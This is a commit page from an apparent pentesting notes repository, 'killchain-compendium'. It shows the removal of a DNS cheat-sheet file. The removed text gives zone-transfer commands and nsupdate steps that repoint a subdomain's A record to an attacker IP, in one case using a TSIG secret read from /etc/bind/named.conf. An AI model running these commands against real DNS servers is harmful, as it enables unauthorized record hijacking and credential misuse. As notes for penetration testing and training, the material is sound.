whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

clean up and rewrite

This commit is contained in:
whackx 2023-08-09 21:53:59 +02:00
parent 0f1b59e80f
commit 3f066cb663
1 changed files with 0 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
Enumeration/:w
View File

@ -1,43 +0,0 @@
# DNS
## Subdomain Enumeration
* Get all the info via
```sh
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
## Join a Domain
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
### Found Secrets for Keys
Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate
server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
send
```
*Hint:* Copy the lines, every space counts as it has to be exactly like in the example